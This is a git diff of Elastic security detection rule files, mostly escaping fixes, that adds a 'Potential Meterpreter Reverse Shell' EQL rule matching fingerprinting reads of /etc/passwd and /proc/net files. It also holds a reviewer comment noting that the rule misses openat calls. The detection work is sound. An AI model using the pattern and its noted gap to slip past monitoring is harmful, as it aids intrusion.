+++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_2.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_3.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_3.json
index 670b6904257..448a75f6749 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_3.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_4.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_4.json
index 2a329d3d91a..288f1aeaf33 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_4.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_5.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_5.json
index 6df80c141c9..7ad60bee59b 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_5.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_6.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_6.json
index bf422e750ca..0730d51188e 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_6.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def",
- "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```",
+ "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_7.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_7.json
index ed371d03d4b..bb63dfacfab 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_7.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def",
- "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```",
+ "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -93,7 +93,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_8.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_8.json
index ab57c78fb2b..98b6d11852d 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_8.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_8.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def",
- "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```\n",
+ "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -93,7 +93,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c81fc9d-1eae-437f-ba07-268472967013_1.json b/packages/security_detection_engine/kibana/security_rule/5c81fc9d-1eae-437f-ba07-268472967013_1.json
index 40867d89358..edf6cab8f48 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c81fc9d-1eae-437f-ba07-268472967013_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c81fc9d-1eae-437f-ba07-268472967013_1.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_1.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_1.json
index fab4516a05e..c98459da16e 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_1.json
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Meterpreter Reverse Shell",
- "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /proc/net/ -p r -k audit_proc\n-w /etc/machine-id -p wa -k machineid\n-w /etc/passwd -p wa -k passwd\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
+ "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /proc/net/ -p r -k audit_proc\n-w /etc/machine-id -p wa -k machineid\n-w /etc/passwd -p wa -k passwd\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
 "query": "sample by host.id, process.pid, user.id\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and \n auditd.data.a2 == \"1b6\" and file.path == \"/etc/machine-id\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/etc/passwd\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and \n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/route\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/ipv6_route\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/if_inet6\"]\n",
 "related_integrations": [
 {
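Review bot: The `query` context line in this hunk matches only `auditd.data.syscall == "open"`, while the `-w` watch rules the `note` tells operators to add also produce records for `openat`, which is how glibc-based binaries on current x86_64 distributions implement `open()`; a payload that reaches `/etc/passwd` or `/proc/net/route` through `openat` would generate audit events this sequence never joins. If those builds are in scope, the five terms could become `auditd.data.syscall in ("open", "openat")`, but note that `auditd.data.a2 == "1b6"` is the mode argument for `open` and the flags argument for `openat` (whose mode is `a3`), so the predicate would need a per-syscall branch rather than a straight widening. This is a versioned generated rule file, so the fix belongs in the upstream rule source rather than here; the JSON object the hunk belongs to begins and ends outside it.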
@@ -65,7 +65,7 @@
 ],
 "risk_score": 47,
 "rule_id": "5c895b4f-9133-4e68-9e23-59902175355c",
- "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /proc/net/ -p r -k audit_proc\n-w /etc/machine-id -p wa -k machineid\n-w /etc/passwd -p wa -k passwd\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
+ "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /proc/net/ -p r -k audit_proc\n-w /etc/machine-id -p wa -k machineid\n-w /etc/passwd -p wa -k passwd\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -97,7 +97,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_2.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_2.json
index cfa37ceb871..6b4ad1b8f91 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_2.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -96,7 +96,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_3.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_3.json
index c87c0c9e60b..a1af6004224 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_3.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -96,7 +96,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_4.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_4.json
new file mode 100644
index 00000000000..40351d476db
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_4.json
@@ -0,0 +1,120 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection.",
+ "from": "now-9m",
+ "index": [
+ "auditbeat-*",
+ "logs-auditd_manager.auditd-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Meterpreter Reverse Shell",
+ "query": "sample by host.id, process.pid, user.id\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and \n auditd.data.a2 == \"1b6\" and file.path == \"/etc/machine-id\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/etc/passwd\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and \n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/route\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/ipv6_route\"]\n[file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and auditd.data.syscall == \"open\" and\n auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/if_inet6\"]\n",
+ "related_integrations": [
+ {
+ "integration": "auditd",
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "auditd.data.a2",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "auditd.data.syscall",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": 
true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pid",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "user.id",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "5c895b4f-9133-4e68-9e23-59902175355c",
+ "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -w /proc/net/ -p r -k audit_proc\n -w /etc/machine-id -p wa -k machineid\n -w /etc/passwd -p wa -k passwd\n\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1059",
+ "name": "Command and 
Scripting Interpreter",
+ "reference": "https://attack.mitre.org/techniques/T1059/",
+ "subtechnique": [
+ {
+ "id": "T1059.004",
+ "name": "Unix Shell",
+ "reference": "https://attack.mitre.org/techniques/T1059/004/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0011",
+ "name": "Command and Control",
+ "reference": "https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1071",
+ "name": "Application Layer Protocol",
+ "reference": "https://attack.mitre.org/techniques/T1071/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 4
+ },
+ "id": "5c895b4f-9133-4e68-9e23-59902175355c_4",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_101.json b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_101.json
index e49ed32ce6a..e5b414a383a 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_101.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_102.json b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_102.json
index ff5a3d59b91..b6c7ab2af7e 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_102.json
@@ -28,7 +28,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
